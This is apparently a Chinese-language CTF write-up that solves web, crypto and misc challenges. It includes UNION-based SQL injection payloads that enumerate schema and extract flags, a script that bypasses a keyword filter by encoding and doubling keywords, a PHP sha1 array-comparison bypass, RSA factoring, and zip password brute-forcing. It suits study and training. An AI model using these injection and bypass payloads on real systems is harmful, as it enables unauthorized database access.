web

土肥原贤二

题目描述

题目分析

SQL注入,应该是没有过滤,且有报错

题目解决

查库

1
' or '1'='0' union select 1,2,3,database()#

返回

1
luozhen

继续查表

1
' or '1'='0' union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='luozhen'#

返回

1
flag,goods

继续查列

1
' or '1'='0' union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name='flag'#

返回

1
id,flag

最后查值

1
' or '1'='0' union select 1,2,3,flag from flag#

flag

1
flag{20_welcome_19}

吴佩孚

题目描述

题目分析

base64加jsfuck(丢浏览器控制台即可)

题目解决

先解一下base64,然后丢控制台,done!

flag

1
flag{sdf465454dfgert32}

戴星炳

题目描述

题目分析

爬取网页,提取表达式,eval,然后post

题目解决

脚本

1
2
3
4
5
6
7
8
import requests
import re
url = "http://47.103.43.235:82/web/a/index.php"
re = requests.get(url).text
re = re.search('0.*<',r).group(0)[:-1]
data = {"result":eval(r)}
re = requests.post(url,data=data).text
print(re)

flag

1
flag{Y0U_4R3_3o_F4ST!}

晴气庆胤

题目描述

题目分析

1
2
3
4
5
6
7
8
9
10
11
<script>
/*
if ((string)$_POST['paraml']!==(string)$_POST['param2']&&md5($_POST['paraml'])===md5($_POST['param2']))
*/
function tanchu(type,info,time){
$('.el-message').removeClass('mis-dis');
$('.el-message').addClass(type);
$('.el-message').css('z-index','999999');
$('.el-message p').html(info);
}
</script>

类似题目 hgame2019-week3,web题:

题目解决

看上面链接里面的wp就好。

flag:

1
忘了,平台关了

冈村宁次

题目描述

题目分析

base64,rev(反字符串),一次过滤union,select

题目解决

脚本

1
2
3
4
5
6
7
8
9
10
import base64
import requests
url = "http://47.103.43.235:83/web/a/index.php?id="
string = "1 uniunionon selselectect 1,1,1,1,1,flag from ctf_sql.FLAG#"
string = string.encode('utf-8')
string = base64.b64encode(string)
string = string[::-1]
re = requests.get(url+str(string))
print(string)
print(re.text)

flag

1
flag{s9li_1s_s0_e4sY}

作战计划

题目描述

题目分析

原题原payload,一键getshell

题目解决

flag:

1
忘了,平台关了

池步洲

题目描述

题目分析

提示index.phps
文件内容:

1
2
3
4
5
6
7
8
9
10
11
<?php
error_reporting(0);
$flag = '********';
if (isset($_POST['name']) and isset($_POST['password'])){
if ($_POST['name'] == $_POST['password'])
print 'name and password must be diffirent';
else if (sha1($_POST['name']) === sha1($_POST['password']))
die($flag);
else print 'invalid password';
}
?>

数组绕过sha1

题目解决

1
name[]=1&password[]=2

flag:

1
flag{Y0u_just_br0ke_sha1}

crypto

日军空袭

题目描述

题目分析

base64 url 栅栏

题目解决

不断base64,url解密得:

1
fB__l621a4h4g_ai{&i}

然后栅栏:

1
2
3
4
5
fB__
l621
a4h4
g_ai
{&i}

flag:

1
flag{B64_&_2hai_14i}

潘汉年

题目描述

1
2
3
你能解开这段密文吗?
Tips:flag格式为 flag{xxx}
bg[`sZ*Zg'dPfP`VM_SXVd

题目分析

变异凯撒,间隔5,6,7,8.。。

题目解决

写脚本或者手动解

flag:

1
flag{c4es4r_variation}

袁殊

题目描述

题目分析

先用openssl提取公钥文件,直接分离n

题目解决

公钥提取

1
openssl rsa -pubin -text -modulus -in warmup -in gy.key

分离或者本地工具

最后解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import gmpy2
import binascii
n1=0xA9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9
n = 76775333340223961139427050707840417811156978085146970312315886671546666259161
e = 65537
p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517
d = gmpy2.invert(e,(p-1)*(q-1))

with open("fllllllag.txt",'rb') as f:
print(f.read().encode('hex'))

c = 0x8ddbf10eb814bbe60cb05957a2445ae99f11a1e6ee33877082d8d2b01428d731
flag = pow(c,d,n)
print hex(flag)

然后在线16进制转字符串(要去掉一位)

flag:

1
flag{_2o!9_CTF_ECUN_}

misc

死亡真相

题目描述

题目分析

先丢audacity,然后看频谱图发现

1
flag:85a9d4517d4725_b9_8cbc9fd_554216

32位,经过一番折腾,猜测是MD5值,但缺了3个数据。

然后开始写脚本用在线网站,然后脚本能力不行,要不就是网站太弱解不了,要不就是要验证,放弃。。。

最后直接手动猜测3个0,然后解出来了,崩溃了。。。。

得出结论:出题人太善良了!!!

题目解决

用这个

flag:

1
flag{hsd132456}

大美晚报

题目描述

题目分析

png文件里面藏有zip文件,zip文件有密码(附有注释:管理员QQ号),千万注意不要去社工,这个是提示我们密码都是数字,暴力破解就是了。但里面有一点小坑,zip文件后面有一堆没用的东西,删掉。

题目解决

先用foremost分离文件,然后处理好zip文件,最后ARCHPR暴力解决。

密码:

1
674290437

解压文件内容:

1
2
3
4

flag{d6@YX$_m^aa0}

解压密码QQ号为杜撰,请勿当真!

flag:

1
flag{d6@YX$_m^aa0}